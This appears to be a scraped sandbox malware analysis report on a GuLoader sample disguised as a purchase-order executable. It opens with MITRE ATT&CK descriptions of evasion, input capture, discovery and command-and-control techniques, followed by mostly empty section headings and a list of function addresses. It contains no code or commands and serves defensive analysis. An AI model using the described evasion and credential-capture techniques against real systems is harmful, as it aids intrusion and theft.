Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	API monitoring, Binary file metadata, DLL monitoring, Kernel drivers, Loaded DLLs, PowerShell logs, Process command-line parameters, Process monitoring, User interface, Windows Registry, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using a protocol and port paring that are typically not associated. For example, HTTPS over port 8088or port 587as opposed to the traditional port 443. Adversaries may make changes to the standard port used by a protocol to bypass filtering or muddle analysis/parsing of network data.
Tactics:	Command and Control
Data Sources:	Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Analysis Report SBG-1100319PurchaseOrder.exe

Overview

General Information

Detection

Signatures

Classification

Startup

Malware Configuration

Threatname: GuLoader

Yara Overview

Memory Dumps

Sigma Overview

System Summary:

Signature Overview

AV Detection:

Compliance:

Networking:

Key, Mouse, Clipboard, Microphone and Screen Capturing:

System Summary:

Data Obfuscation:

Persistence and Installation Behavior:

Boot Survival:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Anti Debugging:

HIPS / PFW / Operating System Protection Evasion:

Language, Device and Operating System Detection:

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

Contacted IPs

Public

General Information

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASN

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Data Directories

Sections

Resources

Imports

Version Infos

Possible Origin

Network Behavior

Network Port Distribution

TCP Packets

UDP Packets

DNS Queries

DNS Answers

Code Manipulations

Statistics

Function 00418EC8, Relevance: 211.2, APIs: 116, Strings: 4, Instructions: 1209
COMMON

Function 00426ED2, Relevance: 72.1, APIs: 40, Strings: 1, Instructions: 374
COMMON

Function 0042F04D, Relevance: 31.6, APIs: 17, Strings: 1, Instructions: 107
COMMON

Function 0041FE82, Relevance: 28.7, APIs: 19, Instructions: 222
COMMON

Function 00420792, Relevance: 27.2, APIs: 18, Instructions: 192
COMMON

Function 0041EB68, Relevance: 25.7, APIs: 17, Instructions: 188
COMMON

Function 00427B51, Relevance: 25.7, APIs: 17, Instructions: 186
COMMON

Function 00427791, Relevance: 22.7, APIs: 15, Instructions: 151
COMMON

Function 0041FA67, Relevance: 21.1, APIs: 14, Instructions: 148
COMMON

Function 0042F1E0, Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 68
COMMON

Function 004201DE, Relevance: 18.1, APIs: 12, Instructions: 117
COMMON

Function 004279A1, Relevance: 18.1, APIs: 12, Instructions: 115
COMMON

Function 0041FC82, Relevance: 16.6, APIs: 11, Instructions: 145
COMMON

Function 00420621, Relevance: 13.6, APIs: 9, Instructions: 98
COMMON

Function 004203AA, Relevance: 13.6, APIs: 9, Instructions: 96
COMMON

Function 00427590, Relevance: 10.6, APIs: 7, Instructions: 67
COMMON

Function 0041EF1B, Relevance: 9.1, APIs: 6, Instructions: 71
COMMON

Function 00420518, Relevance: 9.1, APIs: 6, Instructions: 71
COMMON

Function 00427E00, Relevance: 7.6, APIs: 5, Instructions: 63
COMMON

Function 0041EE14, Relevance: 7.6, APIs: 5, Instructions: 62
COMMON

Function 00418DD1, Relevance: 7.6, APIs: 5, Instructions: 61
COMMON

Function 00426DDB, Relevance: 7.6, APIs: 5, Instructions: 61
COMMON

Function 004276A9, Relevance: 7.6, APIs: 5, Instructions: 58
COMMON

Function 00419FE1, Relevance: 7.6, APIs: 5, Instructions: 57
COMMON